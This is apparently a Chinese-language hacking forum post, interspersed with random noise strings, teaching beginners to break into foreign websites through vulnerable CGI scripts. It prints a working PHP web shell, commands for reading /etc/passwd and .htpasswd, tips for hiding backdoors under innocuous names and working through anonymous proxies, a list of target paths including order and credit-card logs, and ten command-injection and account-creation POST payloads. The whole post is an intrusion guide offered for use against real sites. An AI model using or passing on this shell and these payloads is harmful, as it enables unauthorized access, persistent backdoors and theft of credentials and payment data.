CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
大家好 我是bboyhip  只是一名菜菜的exploiter
: D* H) l, x, z/ @! P; i' b' U% X很开心来到贵论坛
& Q1 ^; G3 s2 m* [/ K这里让我感觉 很有技术交流的感觉
7 P% \0 U; E; h7 ^6 v2 _我会长长来玩的
; W6 I0 b$ Q. b) y前言:
' Q5 K% Q2 l8 z# W7 R& _, m以下讲解针对欧美日本网站
當我們在做滲透分析的時候 方法有很多
1 R2 J8 p( ~- k& r  ~& Z我门都知道 国外伺服器大多是linux 平台
所以有很多网站程序有6成都会使用cgi 脚本来管理
% P4 O" c+ E) L目录为/cgi-bin/
5 n  x7 g: ^2 G
, i0 H3 p& o  \7 p3 E5 y' i, R只是个人在实务上一些经验
- {9 s) g6 |9 V+ s写的不好 请多多见谅喔
在这里我简单分为几个部份一定要會的
1 E, F4 \( T# y4 ]讲解一下
让没有基础的人很容易上手

以下内容跟帖回复才能看到
' x0 F0 P$ h6 S$ l' w==============================

$ U0 d9 B, `( C第1部份: 何谓Shell?
, T6 o; E" ^3 q; YShell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
A shell is the program which reads user input from the command line and executes actions based upon that input.
6 ]- K& ]) d- E& Z  y意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.

, d3 W9 c# i7 I5 X9 o8 ^+ N7 B对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
$ e+ K7 h* L/ @/ b* F要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
! S/ p* C, i2 ^- N& S: _: V所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.
6 [% J- Q' S9 H/ a
, S) m; ]3 O# y  t* W第2部份: Unix 指令
$ p: r' i' l1 K4 }% p以下是一些常见及重要的指令:
; \9 H% i1 b7 S% m- \pwd: 显示当前目录, 即是後门/程式所在的位置
如 /home/www/site.com/cgi-bin/
ls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
ls -al :详细列出档案资料(当前目录)
) N  C6 q+ T4 W( v) zls /: 列出根目录
4 N4 Y1 D  b( q2 g& ols /etc: 列出/etc的资料夹及档案
$ T3 p! |: Z0 R, U1 ~' ?, ~% kls ../ -al: 详细列出上一层的资料夹及档案
( Q7 W# Z+ _' J; m- [. \cat: 显示档案内容
cat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
cat /etc/passwd: 显示 /etc/passwd 这个档案的内容
who: 显示谁login 至系统
+ s& Y! f5 Q' |! K, qman: 显示指令用法  
man ls: 显示ls这指令的用法  
7 j4 A" m' u* `; O% Jmkdir 建立目录
2 h/ K* w7 C4 @2 I7 c5 ~: B: K7 qrmdir 删除目录
mv 移动档案
rm 删除档案
& r1 y. V: B+ E& H# `2 S
  O/ |0 `5 c/ K3 K/ z) m+ O& F第3部份: Shell的使用
% Q" d6 g2 w& y/ d  {) w例如:
http://site.com/refer.php
% N, f, i  R1 `$ x这是我的後门, 原代码如下:
<Form Action="#" Method="POST">
* V( }, o5 n+ ]<Input type="text" name="cmd">
<Input type="Submit">
</Form>
  m4 _# I2 J$ N' p5 h4 T<?php
! U& X- A7 h3 f$ @6 ]$cmd = $_POST['cmd'];
6 n% z( e* x( m: K  a$Output = shell_exec($cmd);
4 k! _8 \9 Z* v1 L+ z! \echo $Output;
?>
( I+ L0 v6 W7 J0 L/ c9 m3 F$ M输入pwd, 可得到绝对路径:
: d* d  h) m1 \7 \' f6 ^/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com
. W0 J3 a, m% B: V
第4部份: 注意事项
- 使用匿名代理, 保障自己
- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
5 u% Y: Z( n3 R8 \! g% O, B- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
不容易被发现.
! P6 B$ f8 r8 f. }" K& ?- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
, U0 v3 n( P- y0 k7 S针对网站的渗透分析方法太多了
9 d5 P6 Q! |0 e" j4 i) @* s* {6 E这篇文章的重点是cgi 脚本攻击
所以我用简单的叙述形容
开始讲解脚本入侵过程:
  w. T) }% g/ P% \在这里提供一些方法思路让大家学习一下
7 h/ n( |! J; l: N' ]2 V
1.一开始对一个网站进行cgi漏洞扫描
4 G- c( z$ _0 ]我们需要的东西有
& x/ J7 M+ o8 n扫洞工具 如:triton..等等
3 W2 A. N9 A' m! @, TE表
8 m  Y: t+ X/ w! b9 J% ]如
8 X4 q" L: \  i0 ]: \* Q, U5 }/cgi-bin/add-passwd.cgi
1 J6 C2 p' T4 g4 j, @% q- K5 }/WebShop/templates/cc.txt
/Admin_files/order.log
/orders/mountain.cfg
7 [7 [" U( T! D" W/cgi-sys/cart.pl
( B# a: A# M  J0 C4 e( v# K/scripts/cart.pl
/htbin/cart.pl
+ q9 |7 o  e: W4 B! x! rE表来源可以是网路收寻或是自己的0 day
, Z  s6 m, f2 s' P& C/ f
/ M2 q* A. `$ F( a1 f7 q2.怎样确认扫到的洞 是真的还假的?
. m! F; u( `+ Q+ i# {9 d举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
% u4 l' Z, Z* z' y一般都是在IE里先看一下的,记住这个返回码哦
ERROR:This script should be referenced with a METHOD of POST.
没有返回一定是假的
% K8 p: B, p5 U% ]' s+ Y* q3.重来来了 很多人都会问我
他扫到很多洞 但是不会使用
% d( s$ p5 _- ?2 `0 o( s; `因为这些漏洞 使用的语法 称为post
, a; Z& e7 T3 E1 Z4 E( y  n4 x我们要找post 的方法很多
可以是源代码分析 找出介质
* G: I. n1 H& G6 J8 q或是用抓包工具 抓他的语法...等等
. i7 ~0 F+ p% S" x
以下我提供10个 cgi 洞以及使用方法post
7 M- W! I  X9 E+ a# C; Q6 C让大家可以针对网站去做扫描  
1 E- {) T3 o! r! r9 K/index.cgi
wei=ren&gen=command
/passmaster.cgi
8 w! M  Z  P3 RAction=Add&Username=Username&Password=Password
7 g; T+ ?* h) {- c. J/accountcreate.cgi
/ m& q3 w0 E# w# eusername=username&password=password&ref1=|echo;ls|
3 O/ C0 F: n# b6 u/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
/addusr.pl
6 t( X: h+ ]+ Q& U/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
/ccbill-local.asp
post_values=username:password
/count.cgi
' S4 {- B% E+ f) K; dpinfile=|echo;ls -la;exit|
# x4 S$ _& m1 O) O2 y* {/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
/verotelrum.pl
/ b$ N- A7 ?) g" U' c/ Overcode=username:password:dseegsow:add:amount<&30>
/af.cgi_browser_out=|echo;ls -la;exit;|
1 Y( h1 K- _2 P% g: [
7 b3 m7 s/ c2 Z3 m今天就讲到这  感谢大家支持
( Q, m, D1 P# S: F! [5 K